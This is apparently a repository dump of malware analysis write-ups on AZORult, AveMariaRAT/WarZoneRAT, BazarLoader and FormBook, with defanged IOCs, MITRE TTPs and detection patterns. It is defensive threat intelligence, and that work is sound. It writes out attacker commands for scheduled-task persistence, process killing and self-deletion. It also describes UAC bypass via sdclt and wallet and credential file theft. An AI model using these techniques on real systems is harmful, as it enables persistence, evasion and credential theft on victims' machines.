├── AZORult └── AZORult.md ├── AveMAriaRAT | WarZoneRAT └── AveMariaRAT-WarZoneRAT.md ├── BazarLoader └── A js Downloader - BazarLoader.md ├── FormBook └── FormBook.md ├── LaplasClipper └── LaplasClipper.md ├── Macros └── A macro downloader.md ├── PDF └── A phishing PDF downloader.md ├── RAT ├── NanoCore │ └── A VBS loader of NanoCore.md └── Readme ├── README.md ├── Ransomware ├── RagnarLocker │ └── Quick view RagnarLocker.md └── Readme ├── RecordBreaker └── RecordBreaker.md ├── SilentBuilder └── SilentBuilder.md ├── SmokeLoader └── SmokeLoader.md ├── SysJoker ├── A new Backdoor: SysJoker.md └── Readme └── Tofsee └── Tofsee backdoor.md /AZORult/AZORult.md: -------------------------------------------------------------------------------- 1 | # _Overview 2 | 3 | _AZORult is one of the best known malware within the Stealer family. It is usually sold on Russian forums for prices ranging up to $100. This malware has been used by a large number of important threat actors, including some dedicated to crime such as FIN11 or TA505 (GracefulSpider) or others that are part of a state-sponsored model such as GorgonGroup from Pakistan._ 4 | 5 | _This malware usually starts from an initial point as documents via Spear-Phishing or compromised web pages and is characterized by performing different file drops that later will execute and check the connection to the C&C, after this, it will steal information and create persistence or a backdoor to, before performing the exfiltration of the data, have opportunities to persist in the system and thus, the actor continue obtaining information from the system to which the affected computer belongs and sometimes pivot._ 6 | 7 | # _Technical Anlysis 8 | 9 | As mentioned above, this malware is most commonly found after Spear-Phishing or a Web site that has been compromised. After this, its main objective will be to obtain data from elements such as search engines, FTP or emails. 10 | 11 | An example of what its steps would be is as follows: 12 | 13 | ![image](https://user-images.githubusercontent.com/91592110/224556672-90418d79-8cd2-4e0a-b6d8-12f6a0d6fb19.png) 14 | 15 | Once we have a general understanding of what this malware is and what are its steps, we visualize how several samples would be executed to have the widest possible context, since, being a malware that several groups use and with the possibility of being able to buy it, we find different versions of AZORult coexisting 16 | 17 | After reviewing dozens of samples the most common is to see executions of this one doing the first phase launching several cmd.exe to support itself in the execution while dropping other files in temporary paths or using sleeps through PS to avoid the sandbox analysis timeout or delay the execution. 18 | 19 | ![image](https://user-images.githubusercontent.com/91592110/224557218-f12f529b-0504-4c20-8c6e-de773316e5ab.png) 20 | 21 | During this phase, different files are launched from behind in folders such as: 22 | 23 | ``` 24 | C:\Users\\AppData\*\Temp|Roaming 25 | C:\ProgramData 26 | C:\Users\\ 27 | ``` 28 | 29 | Here we will see different files among which, depending on the version, we can find scripts and other binaries that support the execution or the following file, which will be AZORult. 30 | 31 | Before the execution of the Stealer, depending on the version, it performs different actions such as: 32 | 33 | > Create tasks to create persistence: 34 | 35 | ``` 36 | schtasks /create /tn /tr "" /sc minute /mo 1 /F 37 | ``` 38 | 39 | >Modify Office settings, where we can see how the Resilience or the MRU that would make changes which will indicate that you will not be able to recover Office files that you have open and that your Office history will disappear. In this case, performed on Word, which indicates that you are covering your back, as one of the samples came from Spear-Phishing 40 | 41 | ![image](https://user-images.githubusercontent.com/91592110/224557923-144f20d2-a3ec-4a3f-ad33-2fc3a2e3794c.png) 42 | 43 | 44 | > Killing other processes: 45 | 46 | ``` 47 | Taskkill /F /IM winword.exe 48 | ``` 49 | 50 | Or run the AZORult, which is your final objective as your initial "Dropper" part. It is worth noting, that the AZORult seen, mostly were either .NET obfuscated with SmartAssembly or AutoIT (The most common) or NullSoft, I also found some in C++ 51 | 52 | ![image](https://user-images.githubusercontent.com/91592110/224557733-9b213c37-b7bb-4df3-84e8-caddd9a03d07.png) 53 | 54 | Once the stealer is deployed, it will perform some actions in one way or another, since, as I said, several versions usually coexist at the same time. We can see how they usually have obfuscation and/or anti-analysis techniques 55 | 56 | ![image](https://user-images.githubusercontent.com/91592110/224558128-eaed7574-a10d-48f1-b7d5-ca517d792d47.png) 57 | 58 | We can see from anti-dbg where it is observed if there is any thread with the DBG, or locating the HEAP flags, in short, I have seen different ways to avoid that we analyze it at low level. 59 | 60 | Subsequently, we can see how he tries to avoid reinfection with Mutex, but not all samples used the mutex. 61 | 62 | ![image](https://user-images.githubusercontent.com/91592110/224558271-4effb092-e566-4158-846c-3056f964f70f.png) 63 | 64 | During the rest of the execution, I notice how it actually tries to control at several points which processes are running on the system, usually linked to anti-analysis as well since it allows us to see if there are any applications that we do not want to be running 65 | 66 | ![image](https://user-images.githubusercontent.com/91592110/224558344-9f31784c-3927-45b2-ad39-a147198542f2.png) 67 | 68 | To later look for permissions that it has in execution via Token to then be able to execute elements in a different thread with the context from which it has obtained all the information related to the credentials of the main process. 69 | 70 | ![image](https://user-images.githubusercontent.com/91592110/224558593-d72e2364-d89e-4f0f-bd8b-3ca1b3e8043c.png) 71 | 72 | In other words, we can check if the process(Thread) in execution has enough privileges to take the thread context and execute whatever we want in the thread with the same privileges, or with the privileges of another user :) 73 | 74 | I also find the ability to control the device by remotely shutting it down or suspending it using the Suspend + Force flag quite interesting 75 | 76 | ![image](https://user-images.githubusercontent.com/91592110/224559188-d6dc4fb4-e33c-4e7e-bd87-65ebc095e2d0.png) 77 | 78 | ![image](https://user-images.githubusercontent.com/91592110/224559201-4f586858-a1fe-46c5-9264-b02467f898f5.png) 79 | 80 | In the meantime, we forget the most important parts here, which are, the information theft, where according to different samples we can see that it obtains information from elements such as: 81 | 82 | * Mail informaton 83 | * Wallets 84 | * FTP 85 | * Browsers information (Cookies, History...) 86 | * SSH (Putty|WinSCP) 87 | 88 | ![image](https://user-images.githubusercontent.com/91592110/224559341-381f2024-c36a-4977-a4b7-66970b6c5db8.png) 89 | 90 | Once you have obtained everything you wanted you make requests to the C&C with all the data you have obtained. It is worth noting that most samples I have found of AZORult, before running most of its functions had a check where checks if it reached the C2, if this did not happen, automatically stopped the execution, this is quite common because it avoids that if some analysts focus on the Sandbox and the C2 falls, we can not analyze the content of what comes next, besides generating an extra layer of protection, as sometimes analysts analyze malware without internet traffic. 91 | 92 | ![image](https://user-images.githubusercontent.com/91592110/224560382-e12c1e15-a931-4261-91ed-790d33a5fa18.png) 93 | 94 | I have found myself analyzing quite a few samples that did not have C2 and I have had to bypass the checks or directly understand with the dissaasembly that I was doing with the context of the rest of the samples, since as you know, C&Cs come and go and usually fall relatively quickly due to the great work done by the community and the companies reporting them. 95 | 96 | Finally, it is usually observed in VT how the samples I am analyzing are related to each other to check if it leads me to IP/Domains that are highly reported, to find more samples and therefore, different versions, to see if there is any collection where I can get more context from the intelligence part, and so on 97 | 98 | ![image](https://user-images.githubusercontent.com/91592110/224560624-6703aef0-ad96-47a7-b803-2f7965d50380.png) 99 | 100 | # _Summary of behaviour 101 | 102 | Chain: 103 | 104 | ``` 105 | Dropper > Infection > C2 communication > Information theft > Persistence and backdoor creation > Encryption > Data exfiltration 106 | ``` 107 | 108 | Office Manipulation: 109 | 110 | ``` 111 | (PrntPrc) Winword|Excel | TempFile > (ChildPrc) cmd.exe | powershell.exe > (cmd contains) \Resiliency /f 112 | (PrntPrc) Winword|Excel | TempFile > (ChildPrc) cmd.exe | powershell.exe > (cmd contains) \File MRU /v 113 | ``` 114 | 115 | Persistence: 116 | 117 | ``` 118 | (Cmd) schtasks /create /tn /tr "" /sc minute /mo 1 /F 119 | ``` 120 | 121 | Timeout | Ping abuse to auto-delete: 122 | 123 | ``` 124 | (Cmd) cmd.exe /c C:\Windows\system32\timeout.exe 3 & del "" 125 | (Cmd) cmd.exe /c ping 127.0.0.1 && del "C:\Users\admin\AppData\Local\Temp\\.exe" >> NUL 126 | ``` 127 | 128 | Suspicious file reading sensitive information: 129 | ``` 130 | (Path Temp|Roaming|ProgramData)Prc > ReadFile > (Path contains) \Wallet\ | \Wallets\ | \Recentservers.xml | \accounts.xml 131 | (Path Temp|Roaming|ProgramData)Prc > QueryReg > (Reg contains) \monero | \Bitcoin | \BitCore | \LiteCoin | \WinSCP | \Url History 132 | ``` 133 | 134 | # _IOC 135 | ``` 136 | 8424aa8b6fda143bd0e2e82ea906b2aee8cf49e416308cd92bd76bdcd46b866f 137 | 38c78ebf970f2fc711eddcfa9ab6562c8ccbcfb053e5ececaa695650cf7d8727 138 | 97710410be07f6ab12c607e9378bb399bdbe3012da245805212e2b1995065c17 139 | Fd8deb7f3c15bd91961790834864db01b5459a019777266c919465b0cac3751f 140 | 9af44ae397fce9e4da5effb82fcecaeadc7dcb412d030c5e0e135639b3686efb 141 | 37d4d7a7b84e4f6ead2e950ba252c23fa360a3176f49184942da3046fa693452 142 | C7930d104f9f1e522835dcbd6aecd707b6bdc27ec4f34149d32b90978e4a6878 143 | 144 | Bllsl2[.]shop 145 | Bllsl2[.]shop/bll/index.php 146 | Nghfh[.]com 147 | Nghfh[.]com/em/index.php 148 | 171.22.30[.]164/standright/index.php 149 | 85.31.45[.]29/ongod/index.php 150 | 64.52.171[.]230/index.php 151 | 209.208.65[.]177/index.php 152 | 185.225.73[.]49/office/index.php 153 | Domcomp[.]info 154 | Domcomp[.]info/1210776429.php 155 | arthurcambell.ac[.]ug 156 | arthurcambell.ac[.]ug/azne.exe 157 | Nanaa[.]tech/index.php 158 | movescx[.]top 159 | cointra[.]ac[.]ug 160 | safetygear[.]pk 161 | scientific[.]pk 162 | karimgousa[.]ug 163 | mistitis[.]ug 164 | goldrush[.]ug 165 | beachwood[.]ug 166 | citypharmacylv[.]com 167 | ddlakava[.]ac[.]ug 168 | cracksmsa[.]ug 169 | lastimaners[.]ug 170 | marksidfgs[.]ug 171 | kenmil.ac[.]ug 172 | 173 | ``` 174 | 175 | > :t-rex: [vc0=Rexor](https://github.com/vc0RExor) :detective: 176 | -------------------------------------------------------------------------------- /AveMAriaRAT | WarZoneRAT/AveMariaRAT-WarZoneRAT.md: -------------------------------------------------------------------------------- 1 | # _Overview 2 | 3 | _AveMariaRAT, also known as WarZoneRAT, is one of the most famous and widely used RATs in recent years. It can be purchased with a license and monthly subscriptions ranging from $16 to $38 on its website. This tool is used and modified by various groups, ranging from disorganized or resource-limited individuals known as script kiddies to highly relevant criminal groups or APTs._ 4 | 5 | _Some of the notable groups that have been observed using AveMariaRAT include:_ 6 | 7 | * Tomiris ( 🏴 ) 8 | * Carbanak | Anunak ( 🇺🇦 ) 9 | * Aggah ( 🏴 ) 10 | * BlindEagle | APT-C-36 ( 🇨🇴 ) 11 | * Confucious ( 🇮🇳 ) 12 | * SideWinder ( 🇮🇳 ) 13 | * HazyTiger | Bitter ( 🇮🇳 ) 14 | * FIN7 ( 🏴 ) 15 | * SandWorm Team | Voodo Bear ( 🇷🇺 ) 16 | * Kasablanka ( 🏴 ) 17 | 18 | _This malware, used by the mentioned groups, can infiltrate the infrastructure in various ways, from exploiting Spear-Phishing to compromising websites where it is downloaded. Once on our devices, the RAT has capabilities to escalate privileges, bypass UAC, evade defenses like security software, gather sensitive information from the device and user, and inject itself into processes to maintain active communication with the C&C server operated by the attacker_ 19 | 20 | # _Technical Anlysis 21 | 22 | As I mentioned earlier, the threat actor commonly utilizes compromised emails or web pages with the ultimate goal of getting you to download or execute the malware sample after passing stage number 1. 23 | 24 | An example step-by-step process of various samples I have analyzed from different versions of AveMariaRAT could be as follows: 25 | 26 | ![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/7b0fd7ea-31b3-4e3f-918f-6a22cd64e22a) 27 | 28 | The executions vary greatly depending on the version, but typically it tries to determine if it is already running on the machine using a Mutex 29 | 30 | ![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/0839fa96-a46f-485f-b1a1-44cac58f1697) 31 | 32 | ![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/4a9ea3be-b4f3-47b9-ae45-1e2967427a1e) 33 | 34 | After that, it can perform anti-dbg/Anti-VM tasks or directly check for security software that may be installed on the system 35 | 36 | ![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/619ef405-4c83-4a9f-a9fe-785684b27f5e) 37 | 38 | ![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/bd1a6e15-ee06-48f3-8dd7-d0d62b513864) 39 | 40 | A common practice in AveMaria RAT is privilege escalation or bypassing UAC. The most common method involves abusing sdclt.exe, which, similar to CompMgmtLauncher (Windows console), searches for a library or component in a registry that is normally not present. This is exploited for hijacking by introducing a library that will be loaded, and these binaries usually have the capability to elevate themselves, allowing them to execute with higher privileges, thus running the malware with the desired privileges 41 | 42 | Here you can see this parallelism with a PoC I made some time ago and we can see that it seeks the same in both cases: 43 | 44 | ![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/b72185d5-ad06-4245-a594-b0e234cedd40) 45 | 46 | ![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/5796da24-e061-4dba-ac08-d771a9c7dfa0) 47 | 48 | The overall picture of how this is done with sdclt is as follows: 49 | 50 | ![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/5cbc41c7-9720-4e12-bfb4-e27476a6fb7b) 51 | 52 | Depending on the sample, there is usually a subsequent resource loading for the injection. This can be found in the resource section of the binary, and as seen, it checks if you are already an administrator, so the previous step should have been executed 53 | 54 | ![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/311152d1-cecb-45cc-b9d7-3102106e3eb5) 55 | 56 | ![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/5ab64b8a-c286-4e63-94b1-3d2d19d21703) 57 | 58 | A common practice I have observed in WarZone RAT is modifying network elements, as well as modifying keys like _\CurrentVersion\Internet Settings_, where it increases the maximum number of simultaneous connections to a server. The objective for this is evident 59 | 60 | ![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/e37b4a51-e562-4b72-a543-c2e9550fee7d) 61 | 62 | Additionally, it is also quite common to see the modification of Zone.Identifier, which allows the attacked machine to receive malicious files from untrusted sources. In other contexts, the connection would be rejected or warned as an unadvisable request. However, after the modification, the malware can send and execute any type of file, bypassing any previous warning or restriction. 63 | 64 | ![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/62fe4010-fdb8-4d70-8ba8-1dbad1a58c4a) 65 | 66 | Furthermore, it is also common for the malware to make changes in security checks of certain browsers, such as Internet Explorer (IE). By changing the registry key, it can increase access to certain addresses to complement its previous behavior 67 | 68 | ![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/3268f312-3a1b-4883-9ef8-4e1cde5e9c51) 69 | 70 | After this, it is common for the malware to establish persistence. Depending on the sample, it may create a copy of itself and then add the path to \CurrentVersion\Run (or similar) registry key, or it may leave a copy of itself or a script in a startup folder that will be executed on system startup 71 | 72 | ![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/e331bb0a-b437-476b-b59a-4d51b7dc2df5) 73 | 74 | In some samples, I frequently observe the modification of folder attributes where the malware launches its copies or files it intends to use or execute. It is common to launch them in a folder like Documents or Downloads and modify the attributes to point to another location, such as ApplicationData or ProgramData. For example, it would be seen as Documents:ApplicationData. This action allows the malware to evade restrictions or security policies of the initial folder where the files are launched and potentially remain undetected. The telemetry data always reflects this pattern 75 | 76 | ``` 77 | : 78 | ``` 79 | ![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/a9aeac68-5c88-40af-9cff-7cc3d9ae40b0) 80 | 81 | During the analysis of different samples, I notice the consistent use of various anti-debugging techniques along with frequent sleep commands that significantly slow down debugging. This forces me to bypass them entirely 82 | 83 | ![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/9d37ae62-f70a-4340-986a-0ef007d5bce4) 84 | ![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/ac9ae255-665f-4e65-9472-3ae1bfb3a72f) 85 | ![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/d899c227-b042-4e23-bece-440be9eafe76) 86 | 87 | Once the sample achieves persistence, the files are launched in the desired folder, and the appropriate privileges are obtained, it commonly proceeds with the injection process. Injection serves multiple purposes: to remain hidden, complicate analysis, and ensure better persistence by residing within the target process. If the process being injected into has elevated privileges, the injected code will also inherit those privileges 88 | 89 | Here we can see different injections performed by this RAT based on different compilations. Commonly, it extracts the code from a specific section and constructs it in memory for subsequent injection. Alternatively, it may assemble or deobfuscate the code from a resource. The target process varies depending on the samples, but I have observed processes related to .NET (such as AppLaunch, csc, RegAsm...) or the RAT itself (either a sample launched with a different name in another folder or self-executing and injecting) 90 | 91 | ![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/2ec84d3b-b39b-4aa0-a0a3-1d8fe0e8d858) 92 | 93 | After this, the malware payload will be within another process and can act more freely. At this point, the most common action is to gather relevant information about the device and/or the user, such as the operating system type, machine name, language used, etc. 94 | 95 | ![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/69179cec-8458-4aeb-bc6e-dfe68fe6b39d) 96 | 97 | Once the previous steps have been completed, the attacker focuses on establishing an external connection. Typically, the malware will have different addresses to attempt to gain access. It will commonly try to establish a connection by opening a socket to the chosen address. In the samples I have analyzed, I have observed that the malware often enters a loop where it attempts to connect to different domains from its list at regular intervals. The malware will remain waiting for instructions from the command and control (C&C) server 98 | 99 | ![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/000c8f31-7b81-44ad-b145-0da187865539) 100 | 101 | Once the connection is established, the attacker has achieved the desired objective: a malware injected into a process, whether legitimate or not, from which they can operate. They have modified network parameters, controlled security software, obtained data about the target system, and established persistence for each system login 102 | 103 | # _TTP 104 | 105 | ``` 106 | [TA0003][T1060] - Persistence using startup folder 107 | [TA0003][T1060] - Persistence Using CurrentVersion\Run Registry 108 | [TA0005][T1089] - AV software check 109 | [TA0009][T1056] - Steal sensitive information 110 | [TA0007][T1057] - Check language 111 | [TA0005][T1497] - Anti-analysis techniques 112 | [TA0005][T1055] - Process Injection 113 | [TA0004][T1548] - UAC bypass abusing of sdclt 114 | [TA0005][T1055] - Load binary from resources 115 | [TA0005][T1112] - Increase the max. connections to a server abusing of Internet Settings 116 | ``` 117 | 118 | # _IOC 119 | 120 | ``` 121 | 135e5dcc50f0857af71511756ec63b393f070fd188506da08012d0201360f890 122 | 07dd531c1198ecf78a9d85e26db1f642de2c06d7234f46f97941afbd28bb742f 123 | 0f6d6875d6ca1793369166534b041daec3f946d83df7c788ad913999ffd81eeb 124 | 389e52a5612f9242ae4162ba51323010a97641be291893dcb9bc261ca26acb27 125 | ef5b814562290c60063075b290966060a79e0cc9e81cd6448d49af5c5879175f 126 | 90ebeaa9a68ea0c1bf9aff1f7902d545fd5623af7aba90d8cbc53ece47f43f51 127 | 96237eb7f3c5304d26fb06feafab631b64a274eb1037f51b58af586040154572 128 | 6c1cc9a94713e2b614dcd99baa05c62f7cab2bb8abdb030b85a1dc539eb21dbc 129 | db382f9a496a46db8d4eaa52ff67355a1d54ccf8531ba6d5ef06c5b445d5d436 130 | 73fc341bbc5be844d20c51d8ee5356b9d44a628d0aef4e95df08b057ea6cadba 131 | 3bebe61724ca5dc55a37b7c851aa645dbf7c64615e523f7dd2b901ff27d7fae0 132 | 3cb44a87566ee76eabd616840ed7d0f5ca8c7ec4d0f40f17642935e60af7074e 133 | 719342deb77a6f03f09db95f137db0de14beb7f98c80372c21238a74d5f58b97 134 | 135 | 5[.]206[.]225[.]104 136 | 146[.]70[.]94[.]3 137 | 95[.]214[.]27[.]90 138 | 161[.]129[.]33[.]242 139 | 173[.]212[.]207[.]73 140 | 104[.]223[.]19[.]96 141 | 142 | warzonlicen1304[.]ddns[.]net 143 | dreams2reality[.]duckdns[.]org 144 | gbotowaya[.]duckdns[.]org 145 | helpme20[.]duckdns[.]org 146 | newnex[.]3utilities[.]com 147 | zpec[.]ru 148 | osairus[.]duckdns[.]org 149 | lacasadelpan2024[.]duckdns[.]org 150 | ``` 151 | 152 | Thank you very much for reading, happy hunting :) 153 | 154 | > :t-rex: [vc0=Rexor](https://github.com/vc0RExor) :detective: 155 | 156 | -------------------------------------------------------------------------------- /BazarLoader/A js Downloader - BazarLoader.md: -------------------------------------------------------------------------------- 1 | # _Overview 2 | 3 | _BazarLoader is known to be used in campaigns by cybercriminal groups, such as WizardSpider, used to perform what is commonly known as InitialAccess (TA0001), usually sending emails containing malicious documents or scripts, with the objective, to download or execute malwares such as Ransomware._ 4 | 5 | # _Technical Anlysis 6 | 7 | We start from a script, specifically JavaScript(JS) that could be launched through a fake ZIP used in phishing campaigns in which, we introduce a fake file with the appearance of a document or a compressed with an invitation message or UPS/FedEx mail, and so on. That will make us download and have it on disk, which is its main stage to achieve its next steps. 8 | 9 | The file is quite obfuscated but we focus on the possibility of an eval that will launch the content or part of the content of the script 10 | 11 | ![image](https://user-images.githubusercontent.com/91592110/139117972-f89cdb86-d476-4225-a1a9-fe589e9cfa4f.png) 12 | 13 | ![image](https://user-images.githubusercontent.com/91592110/139118019-e0f37dfc-396c-4f25-955d-39ffcea28596.png) 14 | 15 | After executing the JS, it tries to open a shell and execute an encoded PS, it tries to make a request to a malicious URL, which, by means of an _IEX_ (Invoke-expression) will execute a download using _"downloadstring"_. 16 | 17 | ![2](https://user-images.githubusercontent.com/91592110/139118829-c6e74179-b738-4965-97bc-0bcbd8401201.png) 18 | 19 | We can see that this URL [_hxxp://menoiras[.]space_] is related to different malicious files, as well as reported by several entities. 20 | 21 | ![image](https://user-images.githubusercontent.com/91592110/139119166-52c5ec05-e6d5-41cf-9501-c79523392660.png) 22 | 23 | ![image](https://user-images.githubusercontent.com/91592110/139119176-f3f9f7e9-325d-4207-952d-09446ea0077f.png) 24 | 25 | We also see that the download goes through 2 points, one in which it will try to perform a download on the path index.php in the previous URL, which, as we see, will perform a download in temp of a _.dat_ against _main.php_ and then run the _rundll32.exe_ and start it with _StartW_, which will be a common export in the binary. 26 | 27 | ![image](https://user-images.githubusercontent.com/91592110/139119594-d49ce1e0-20c4-4734-8ca1-9552723b4b02.png) 28 | 29 | We verify that the file we have in the captured package and the one we get from the download is indeed the same: 30 | 31 | ![4 1](https://user-images.githubusercontent.com/91592110/139121109-6d30758b-1221-4e19-b0ff-03ab52176598.png) 32 | 33 | Subsequently, it executes the dll using the _rundll32.exe_ which is commonly known as the BazarLoader backdoor (_BazarBackdoor) that will perform from here _CobaltStrike_ movements and we can see anomalous traffic and recognition phases in our computer, which could trigger a Ransomware that, considering the APT could be a Ryuk or a Conti, both this step and the previous one may change the version as variations of BazarLoader are used. 34 | 35 | ![image](https://user-images.githubusercontent.com/91592110/139120287-bb7a12f9-3e6e-482b-8f0a-dc647c11fde8.png) 36 | 37 | In these phases after the infection of the PS download we can see different malware associated with this campaign, from Trickbots, through CobaltStrike and computer exploitation, to Ransomwares in more advanced stages. 38 | 39 | 40 | > :t-rex: [vc0=Rexor](https://github.com/vc0RExor) :detective: 41 | 42 | -------------------------------------------------------------------------------- /FormBook/FormBook.md: -------------------------------------------------------------------------------- 1 | # _Overview 2 | 3 | _FormBook is a malware which has been used by different groups, it is mainly attributed to Cobalt Group | Cobalt Spider, although it has been used by others such as Sweed, groups dedicated to financing and espionage, being FormBook a backdoor and an InfoStealer, it has had a great notoriety in recent years. In the waves of campaigns in which FormBook has been involved, it has been one of the most used accesses to the infrastructures, the abuse of SpearPhishing (T1566.002) will go through different phases up to the connection with a C&C._ 4 | 5 | # _Technical Anlysis 6 | 7 | An outline of how the thread of execution of a FormBook sample would work would be as follows: 8 | 9 | ![image](https://user-images.githubusercontent.com/91592110/170861720-59f2ab8f-1c02-4811-aebe-45c9b58b9fc3.png) 10 | 11 | This Malware has variants, interspersed with injections, scripting, etc. 12 | 13 | Once downloaded after phishing the attached document, commonly using DOCX/RTF or XLS, we would obtain a file with macros or embedded objects. 14 | 15 | ![image](https://user-images.githubusercontent.com/91592110/170861747-531efec8-0a1b-4da5-b0e7-7a0abf5a2bd1.png) 16 | 17 | Upon execution we would see an exploit of Microsoft Office Equation Editor CVE-2017-11882 (EQNEDT32.exe), which will exploit the vulnerability by executing code outside of the process memory 18 | 19 | ![image](https://user-images.githubusercontent.com/91592110/170861765-c766caed-e944-46d3-812d-9a6b4ffe1c98.png) 20 | 21 | Immediately after exploitation, we observe how a file has been launched in a temporary folder usually TEMP or Roaming, which was downloaded by EQNEDT32 on a malicious domain 22 | 23 | ![image](https://user-images.githubusercontent.com/91592110/170880101-bd3c9153-d356-46f8-b5c6-7068f3d4d2b7.png) 24 | 25 | ![image](https://user-images.githubusercontent.com/91592110/170880106-f0494a60-db74-4db8-ad6e-88f7a73b16a2.png) 26 | 27 | ![image](https://user-images.githubusercontent.com/91592110/170880113-adaacd9b-ce2b-4327-a99f-49227a9225eb.png) 28 | 29 | After the reversing of this file, we would find another Portable executable (PE) 30 | 31 | ![image](https://user-images.githubusercontent.com/91592110/170880189-0e4fc9c5-dc7c-482d-a713-a2eea545123a.png) 32 | 33 | Later dealing with chain and obfuscation in debugging, we would find a library 34 | 35 | ![image](https://user-images.githubusercontent.com/91592110/170880214-0fd6e872-92b9-410d-af9a-d81354baf329.png) 36 | 37 | This DLL has been widely reported, so we can guess that this step is quite common and does not usually use very different binaries in later phases 38 | 39 | ![image](https://user-images.githubusercontent.com/91592110/170880226-a6bd6631-7b81-41a7-9e13-af75f04fd3cf.png) 40 | 41 | This library will be injected into explorer.exe, so we will see the functions of, depending on versions, Keylogging, Stealing, etc.. Which will always be the point of interest a connection to a C&C in which it will send all the relevant information of the computer or the user. 42 | 43 | Specifically this sample makes requests to the following domains from explorer.exe: 44 | 45 | ``` 46 | www.heyconi[.]com 47 | www.executrainpr[.]com 48 | ``` 49 | 50 | The most common thing in FormBook is, after the injection, auto-delete the files previously launched in temporary paths, for which they usually use commands with cmd.exe or Powershell.exe. 51 | 52 | # _IOC 53 | 54 | ``` 55 | 16a81a265cea156034bea5db891d480535cf697bdd8c8917fc6d994c33ddfdf0 56 | 6a1304d1c9897938d2217e62aee0f4a79af9535dce964f0661e67139948a380e 57 | 075f41c576c8e20d1ec1981a5e4197d514030c69dd653dfc2b94edf5088a0671 58 | 363c3288efc15bdba3db28988766e6554fca04e6bcb49e094f7a521388016fe8 59 | 45734f6c2bf14e396031f665963c7f03e74c1b989a58111a1f5dcf2c05d1e5fc 60 | 1ec2c2c0a29c16146400c52880e887cfae57223b2b621c0f433ef9b619af5343 61 | 02cda7e8e87599f480515b611d57653429825d45dbfd2bcee0b9f1ea8e845fc6 62 | e4769e3e2b77ecaf145799bbd14fc3ebe7b7032f12f34807c59f59cee8eb063d 63 | 0e3a4f080d2ff0bdfa0a7e39df4982232b2d19245e6355e49940c05becfeecc5 64 | 03fa6bc991b15a3d5cd507673d1cccd0b0279315e9a04924d908a9520609a1c3 65 | a734d235386d77a1c6a88bdf63efce5134a82a90e113be647200401b717b891e 66 | f6b976e82b1b830539413b6356f8f2d61432bc2f59d5dfa2833bcab6ed4b3885 67 | f080b3ba979f854761526f4bc6bd5b8210b48d5f91f15b1a1423849107775e11 68 | bd89fe68b099ed00bea985dbdf7c8c0d87deb5a85c29d7a27f09764ab5b9d04d 69 | bcd31729e663369b99fd178377977c5de078512046d2cb4b38c51d80d9801374 70 | 15e17fe1832e832ad58893aa8d5f2e8e33e2fa756d509d2e855daa6a1f4d4027 71 | 2979a77144d0df70f4dff084420d8e034eb6f751027fa44d158de924960f2a6a 72 | eddc1ee1fafda4fe7cf6d114276c992806f33d7527d346464bad7033875fbd66 73 | b1151fa2ddbc4bedbd3bcd7112ff359747776e38a7a57d20572ffaae4170d485 74 | 0d49317865221f81e49e88f6473af6639f15725fa9c894d1d4ee605de3951b65 75 | 6796f10e7f6140f26a49bf9446b2c75dfe0e6dc7d7d88cad5e09d9b608107851 76 | 8535282c1740725ecf68a65e9ce582a5fe28db4ffcfcd07e6b1516d62cc9dc60 77 | 2a25e0a533b850782b1fff19767de5ef74df1c9c02541c510f68d42dddf35cb5 78 | b5e186f373c99f75db50a9b6689f835d4c141c6f369fa63d58da21b5fa13e90d 79 | 8dca7773c881a5f13083046667a97227e4d2ff0b833300ae8b9ae731847dc7ca 80 | 1868d031ba42f5f9b2f176f218647509ebcbf1171ed0da75a594a26744d03d9a 81 | 59513c88f8f80d7a7c871c8f31f7bdf3e96d9831ec74ee9563845c202957a9cf 82 | 10e55528343098fef510828eea445cddd10d15d04e119ccadc3745c19adc458c 83 | 9f3d95b9160149fcdfd2d59114d87917abd2a8b903e1e3f5ccbdae11b1c28d68 84 | 6a4dcd405fe4ec854fd0bfa69f852b2a53e4cfa8bed45c7affeb4f86e963cb08 85 | dd60e55c229563801df128c29f52b21bc1cf22625c8b4b9442b2d7839c9175a4 86 | 5c8cdc3745711d1054704b8663828b005aa7a66535b0004c0364bc5cff832ddc 87 | 5d63cb62e9c2099fa70b843c45883c69237a557d5d7198499c37a95789f00bd4 88 | f46d6d7bf1c9f466498c2a11c9c96fcc594c3490db04e763f81e7552f7ae6764 89 | b01c10020580708d2d28cd94e8ec15fba89d16794a788d0a09928fb2af068117 90 | 669281f9aa118bef43b360b346e7954d6e1e9f04da0c8bff68387a2730c8e928 91 | 25966cc19f04cbbdacdf04249247d606c037cb527669addbfb0d52e0cd948519 92 | edcbff4e011d46b1c1918479985c8bb094d02cdf9494f87903df9faeb6555c09 93 | 24b22264a9954fe9763f2a35d92088be412600ae1e0e6fc8586925a18216c967 94 | 0f87b6c475a0eddbf33a364ed0fbef4f5cd19f8d4776ffad5d0bf0db9d63fc42 95 | ce757f9bd6a6ba9c9b7b27d3923b1dfca6e82b6a955fdf92c91975db6b1abdfb 96 | 5d6683dd926e5e76d11b522fdc8037584d272a5e4fd3a71274acfb4b2e663497 97 | 127250091242413bfb4b360d4ce13d926fbf85a38af2064e0fb73332b526bfad 98 | 67df49c1f0f94c41c91df4cb71835b1e188d19a19b5eb1346f1e0da4444d13d0 99 | e17bfb8370c8badf90756f650e1be4794e77a57abb3619c30789364756304759 100 | cd055a7b832bc32db20e93992cbc4df3698599747d51ebbb091af91156f82dfb 101 | 7754ed56a4703d27cf7447a206cb22f1aa1063d35633062e44860d8652d3b3dc 102 | 